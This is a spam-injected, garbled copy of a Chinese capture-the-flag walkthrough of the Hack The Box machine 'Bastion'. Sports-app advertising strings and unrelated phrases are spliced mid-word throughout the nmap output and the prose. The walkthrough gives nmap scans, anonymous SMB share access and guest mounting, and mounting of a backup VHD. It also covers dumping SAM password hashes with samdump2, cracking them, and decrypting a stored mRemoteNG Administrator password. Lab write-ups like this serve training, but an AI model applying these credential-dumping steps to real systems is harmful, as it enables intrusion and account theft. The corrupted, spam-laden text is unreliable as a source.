ope体育手机端_中国体育app_ope体育app
ope体育手机端

相,种子网-ope体育手机端_中国体育app_ope体育app

admin admin ⋅ 2019-10-08 08:44:13

介绍

方针: 0.隐婚天后晨安总统先生10.10.134 (Windows)

Kali:10.10.16.65

方针: 0.10.10.134 (Windows)

Kali:10.10.16.65

总的来说,Bastion 其实并不是一个特别简略的机器。假如运用 windows 能够更便利地处理这台靶机。Command VM 关于这台靶机其实挺不错的,不过咱们也能够运用 kali 来完结这个靶机。

信息枚举

首要,勘探敞开端口

# Nmap 7.70 scan initiated Sun May 5 12:33:32 2019 as: nmap -sT -p- --min-rate 10000 -oN ports 10.10.10.134 Warning: 10.10.10.134 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.134 Host is up (0.33s latency). N北外星光ot shown: 60653 closed ports, 4873 filtered ports PORT STATE SERVICE 22/tcp open ssh 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ddocsifys 49664/tcp open unknown 49665/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49670/tcp open unknown

吴纯钢琴家

从上面敞开的端口,咱们能够推导出这是一台敞开了 ssh 服务的 windows 机器。接着测验获取这些敞开端口对应的服务:

# Nmap精微素描高清图片 7.70 scan initiated Sun May 5 12:29:46 2019 as: nmap -A -oN services 10.10.10.134 Nmap scan report for 10.10.10.134 Host is up (0.53s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenS周海冰SH for_Windows7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) | 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds No exact OS matches for host (If you know what OS硕果的丑闻 is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.70相,种子网-ope体育手机端_我国体育app_ope体育app%E=4%D=5/5%OT=22%CT=1%CU=37821%PV=Y%DS=2%DC=T%G=Y%TM=5CCED772 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F4%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=A) OS:SEQ(SP=F3%GCD=1%ISR=10A%TI=I%CI=I%肉奴T漆黑大帝迪迦S=A)OPS(O1=M54BNW8ST11%O2=M54BNW8ST11 OS:%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W1=2000%W OS:2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54BNW OS:8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0 OS:%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD柔儿=0%Q=)T4 OS:(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%D河秀彬F=Y%T=80%W=0%S=Z%A=S+% OS:F=AR%O=%RD=0%Q=)T6(R相,种子网-ope体育手机端_我国体育app_ope体育app=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y% OS:T=80%W=0%婉碧诗S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%R OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsof兵士为国守慈祥简谱t:windows Host results: |clock-skew: mean: -43m13s, deviation: 1h09m14s, median: -3m15s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 | System time: 2019-05-05T14:27:12+02:00 | smb-security-mode: | account_used: guest | authenticationlevel: user | challengeresponse: supported | messagesigning: disabled (dangerous, but default) | smb2-security-mode: | 2.02: | Message signing enabled but not required | smb2-time: | date: 2019-05-05 12:27:09 | start_date: 2019-05-05 12:10:06 TRACEROUTE (using port 143/tcp) HOP RTT ADDRESS 1 693.81 ms 10.10.16.1 2 694.08 ms 10.10.10.134 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done at Sun May 5 12:30:42 2019 -- 1 IP address (1 host up) scanned in 56.60 seconds 运用

上面的信息看起来并没有什么特别的。一般的靶机,http 服务往往都是突破口。关于这个靶机,咱们应该注意到敞开在 445 端口的 smb 服相,种子网-ope体育手机端_我国体育app_ope体育app务(445 端口往往也是 windows 机器的突破口)。在 kali 上进行 smb 服务的勘探,咱们能够挑选运用 smbmap, smbclient, enum4linux 等。咱们先来试一下 smbclient动态性:

smbclient -L 10.10.10.134

经过 smbclient,咱们能够在不运用暗码的情况下看到这台靶机的同享。经过 smbclient //10.10.10.134/sharename 来测验拜访同享途径,咱们发现只要 Backups 是能够拜访的。

拜访同享 Backups: smbclient //10.10.10.134/Backups:

在同享途径能够发现一个 note.txt 文件。

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

关于这个运用进程,这个提示仍是有用的。经过 smbclient 来拜访文件不太便利,由于咱们不能够直接阅读文件。所以将这个同享文件夹挂载到 kali 上:

mount -t cifs //10.10.10.134/Backups -o user=guest,password= /mnt/backups

这样咱们就能够直接拜访文件了。这个或许是一个备份文件夹。在一些测验之后,咱们发现了一些风趣的文件。

VHD(虚拟硬盘)文件看起来很有用。依据 wiki:

VVHD是表明虚拟硬盘驱相,种子网-ope体育手机端_我国体育app_ope体育app动器(HDD)的文件格局。它或许包括物理HDD上的内容,例如磁盘分区和文件体系,而后者又能够包括文件和文件夹。它一般用作虚拟机的硬盘。

VVHD是表明虚拟硬盘驱动器(HDD)的文件格局。它或许包括物理HDD上的内容,例如磁盘分区分手by千十九和文件体系,而女性愿望后者又能够包括文件和文件夹。它一般用作虚拟机的硬盘。

所以这个 VHD 文件里边或许包括了更有用的信息。这儿边有 2 个 VHD 文件,一个是 37M,一个是 5.1G。毫无疑问,这个大的或许更有用。可是要把整个 VHD 文件下载下来实在是太困难了,尤其是在这样的网络下。并且靶机相,种子网-ope体育手机端_我国体育app_ope体育app的作者也在论坛里边说过你底子不需要将整个 VHD 文件下载下来。那磷光之刃就将 VHD 文件挂载到 kali:

guestmount --add /mnt/backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro 双花双叶又双枝/mnt/vhd

在网络不是很安稳的情况下这个操作仍是蛮耗时的。接着,这个 VHD 文件就挂载成功了。这应该是一个体系硬盘,没有什么特别的信息。可是咱们能够在里边发现一个 SAM 文件。安全帐户管理器(SAM)是 Windows 中用于存储用户暗码王凤亮的数据库文件。测验拜访 SAM 文件,samdump2 能够将哈希导出。

从上面导出的哈希,L4mpje 的哈希看起来很有用。咱们能够运用在线哈希破解网站 HashKiller 来破解哈希。

简单咱们就破解了这个哈希。并且据咱们一开始获取的信息,这台靶机是敞开了 ssh 服务的,所以咱们测验运用 L4mpje 作为用户名来登录。很走运,咱们进来了。

提权

在运用 L4mpje 用户登录成功后,咱们发现咱们的权限很有限。一般提权能够运用某些软件的缝隙来完结。所以,勘探这个靶机安装了哪些软件很有含义。

咱们发现了一个风趣的文件夹 mRemoteNG。它是一个开源的长途衔接管理东西。它曾经有一个缝隙,能够经过配置文件获取用户的衔接信息。关于这台靶机,现已有人创建了一个东西来破解这个配置文件中的暗码。配置文件存储在 AppData 文件夹中。

看起来 Administrator 的暗码存储在 XML 文件中。咱们能够运用 mremoteng-decrypt 这个东西来破解暗码。

java -jar decipher_mremoteng.jar "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/z相,种子网-ope体育手机端_我国体育app_ope体育appO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

终究,咱们相,种子网-ope体育手机端_我国体育app_ope体育app获取了 Administrator 的暗码。

*本文作者:dongne,转载请注明来自FreeBuf.COM

相关新闻

admin

admin

TA太懒了...暂时没有任何简介

精彩新闻